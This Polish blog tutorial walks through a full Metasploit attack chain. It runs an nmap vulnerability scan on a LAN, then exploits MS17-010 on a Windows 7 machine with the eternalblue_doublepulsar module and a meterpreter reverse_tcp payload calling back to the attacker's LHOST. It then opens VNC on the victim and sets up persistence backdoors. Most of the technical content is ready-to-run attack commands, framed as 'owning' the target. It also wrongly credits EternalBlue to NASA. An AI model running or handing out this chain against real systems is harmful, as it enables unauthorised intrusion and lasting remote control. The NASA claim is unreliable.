Jak już omówiliśmy TOP 25 NAJLEPSZYCH NARZĘDZI DO KALI LINUX, i umieściliśmy METASPLOIT na pierwszym miejscu listy, teraz omówmy i nauczmy się o METASPLOIT. Zalecamy zapoznanie się z Metasploit.

Metasploit początkowo stworzony przez H. D Moore w 2003 roku, aż został przejęty i dalej rozwijany przez Rapid7 21 października 2009 roku. Metasploit-framework jest całkowicie napisany przy użyciu Ruby, i jest standardowym pakietem instalowanym w systemie Kali Linux (a także prawie wszystkich systemach operacyjnych do testów penetracyjnych, jak sądzę). Jest to ulubiony zestaw hakerów lub testerów penetracyjnych do badania luk w zabezpieczeniach, tworzenia i wykonywania exploitów na celach oraz innych prac związanych z bezpieczeństwem.

Metasploit posiada kilka edycji, ogólnie podzielonych na dwie kategorie, wersję darmową i wersję płatną. Wersje darmowe: Metasploit Framework Community Edition (interfejs oparty na CLI) oraz Armitage (interfejs oparty na GUI). Wersje płatne : Metasploit Express, Metasploit Pro, oraz Cobalt Strike (jest on podobny do Armitage, który jest dostarczany przez Strategic Cyber LLC).

Metasploit pozwala użytkownikom tworzyć (lub rozwijać) swój własny kod exploita, ale nie martw się, jeśli nie wiesz jak kodować, Metasploit ma tak wiele modułów i są one stale aktualizowane. Obecnie Metasploit posiada ponad 1600 exploitów i 500 payloadów. W prosty sposób można zrozumieć, czym są exploity i payloads, exploit to w zasadzie sposób, w jaki atakujący dostarcza payload, poprzez lukę w systemie docelowym. Po uruchomieniu przez atakującego exploita zawierającego ładunek przeciwko podatnemu systemowi docelowemu, następnie ładunek ten jest wdrażany (ładunek używany do połączenia się z powrotem do atakującego w celu uzyskania zdalnego dostępu do systemu docelowego), na tym etapie exploit jest gotowy i staje się nieistotny.

„Metasploit nie jest narzędziem do błyskawicznego hakowania, to szalony framework”

Ten artykuł o Metasploicie dotyczy przeprowadzania testów penetracyjnych przeciwko systemowi docelowemu przy użyciu następującego przepływu:

  • Vulnerability Scanning
  • Vulnerability Assessment
  • Exploiting
  • Gaining Remote Access – own the system

PREPARATION

Upewnij się, że nasz Kali Linux ma najnowszą zaktualizowaną wersję. Będą poprawki w każdej aktualizacji. Uruchom następujące komendy:

~# apt update
~# apt upgrade -y
~# apt dist-upgrade -y

Gdy nasza maszyna jest już zaktualizowana, teraz zacznijmy od uruchomienia konsoli metasploita. W terminalu wpisz:

~# msfconsole

Potrzebny jest też dowolny edytor tekstu, Gedit lub Leafpad, aby zebrać po drodze kilka informacji zanim skompilujemy atak. Po pierwsze, zidentyfikuj adres IP interfejsu bezprzewodowego, IP routera oraz maskę sieciową.

Na podstawie powyższych informacji zanotujmy adres IP WLAN1 i routera oraz maskę sieciową. Tak więc notatka powinna wyglądać następująco:

Attacker IP (LHOST): 192.168.1.56
Gateway / Router’s IP: 192.168.1.1
Netmask: 255.255.255.0(/24)

KROK 1 : VULNERABILITY SCANNING

W konsoli metasploita najpierw zbieramy informacje, takie jak docelowy adres IP, system operacyjny, otwarte porty oraz podatność. Metasploit pozwala nam na uruchomienie NMap bezpośrednio z konsoli. Bazując na powyższych informacjach uruchamiamy tę komendę, aby wykonać nasze zadanie zbierania informacji.

msf > nmap -v 192.168.1.1/24 --script vuln -Pn -O

Po wykonaniu powyższej komendy otrzymujemy poniższy wynik.

Wykryliśmy podatny cel działający pod kontrolą systemu operacyjnego Windows, a podatność dotyczy usługi SMBv1. Tak więc, dodaj do notatki.

Target IP (RHOST): 192.168.1.57
Podatność: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)

KROK 2: OCENA PODATNOŚCI

Teraz znamy cel i jego podatność. Sprawdźmy podatność w konsoli metasploit

Teraz znamy cel i jego podatność. Sprawdźmy lukę w konsoli metasploit używając modułu pomocniczego smb_scanner. Uruchom następującą komendę:

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set RHOSTS
msf auxiliary(smb_ms17_010) > run

Metasploit jest pewny podatności i pokazuje dokładną edycję systemu operacyjnego Windows. Dodaj do notatki:

Target OS: Windows 7 Ultimate 7600

KROK 3 : EXPLOITING

Niestety, metasploit nie posiada żadnego modułu exploita związanego z tą luką. Ale, nie martwcie się, jest pewien facet na zewnątrz, który napisał kod exploita. Exploit jest znany, ponieważ został zainicjowany przez NASA i nazywa się EternalBlue-DoublePulsar. Możesz go pobrać stąd, lub możesz podążać za wskazówkami z poniższego filmiku, aby zainstalować kod exploita w swoim metasploitowym frameworku.

Gdy już podążasz za powyższym przewodnikiem, (upewnij się, że ścieżka jest taka sama jak w tutorialu). Teraz, jesteś gotowy do wykorzystania celu. Wykonaj następujące polecenia:

use exploit/windows/smb/eternalblue_doublepulsar
set payload windows/meterpreter/reverse_tcp
set PROCESSINJECT spoolsv.exe
set RHOST 192.168.1.57
set LHOST 192.168.1.56

Exploit

Boom… Exploit się powiódł, dostaliśmy sesję meterpretera. Jak już wcześniej wspomniałem, po uruchomieniu exploita, zostanie uruchomiony payload, którym jest, tutaj użyliśmy, windows/meterpreter/reverse_tcp.

KROK 4 : UZYSKANIE ZDALNEGO DOSTĘPU

Poznajmy więcej dostępnych komend, wpisz ’?’ (bez znaku zapytania) i zobacz listę dostępnych komend. Stdapi, polecenia systemowe to:

Aby zobaczyć więcej informacji o systemie docelowym, użyj polecenia 'sysinfo’. Wynik powinien wyglądać tak.

Ponieważ wstrzyknęliśmy wcześniej do procesu systemowego (spoolsv.exe), uzyskaliśmy przywilej systemowy. Jesteśmy właścicielami celu. Możemy zrobić wiele z komendą do celu. Na przykład możemy uruchomić RDP, lub po prostu ustawić zdalne VNC. Aby uruchomić usługę VNC wpisujemy komendę:

~# run vnc

Wynikiem powinien być pulpit maszyny docelowej, wygląda to tak.

Najważniejszą częścią jest stworzenie backdoora, więc za każdym razem gdy cel rozłączy się z naszą maszyną, maszyna docelowa będzie próbowała połączyć się z powrotem, ponownie do nas. Backdoorowanie jest używane do utrzymania dostępu, to jak łowienie ryb, nie wrzucasz ryby z powrotem do wody, gdy już ją masz, prawda? Chcesz coś zrobić z rybą, czy zachować ją w lodówce do dalszych działań, takich jak gotowanie lub sprzedać ją za pieniądze.

Meterpreter posiada tę funkcję uporczywego backdooringu. Uruchom poniższe polecenie i spójrz na dostępne parametry i argumenty.

meterpreter > run persistence -h

Jeśli nie czujesz się komfortowo z tym przestarzałym skryptem, najnowszy moduł persistence znajduje się pod post/windows/manage/persistence_exe. Możesz go dalej zgłębiać samodzielnie.

Metasploit jest ogromny, to nie tylko narzędzie, to framework, weź pod uwagę, że ma ponad 1600 exploitów i około 500 payloadów. Jeden artykuł nadaje się tylko do przedstawienia ogólnego zastosowania lub idei. Ale, nauczyłeś się tak wiele z tego artykułu.

„Im bardziej podążasz za przepływem ataku, tym więcej masz wyzwań bez wysiłku.”

.

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany.